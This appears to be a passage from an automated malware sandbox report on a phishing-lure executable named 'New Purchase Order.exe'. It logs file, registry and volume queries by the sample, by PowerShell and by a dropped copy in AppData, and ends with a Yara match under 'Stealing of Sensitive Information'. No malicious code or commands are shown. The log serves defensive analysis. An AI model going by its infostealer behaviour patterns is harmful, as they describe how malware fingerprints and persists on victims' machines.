            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Users\user\AppData\Roaming\ibDqDkseW.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
